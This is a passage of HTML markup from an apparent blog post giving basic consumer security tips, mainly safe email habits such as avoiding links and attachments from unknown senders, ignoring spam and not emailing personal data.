for someone to get your banking information if they happen to get your Facebook password.</span></li></ul><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Practice safe email handling. It is best if you...</span></li><ul><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Do not open (or preview) emails from people you do not know.</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Do not click on any link contained within an email. 
If you must use the link, for example for an activation code, retype the link into a new web browser window.</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Do not open any document (.pdf, .doc, .xls, etc...) attached to an email. It can be a malicious document that could install dangerous software onto your system.</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Do not respond to spam or scams. If you receive an offer in an email, and it sounds too good to be true, it probably is!!!</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Do not email personal information (SSNs, credit card numbers, etc...).</span></li></ul></ul></div></div></div>Unknownnoreply@blogger.com0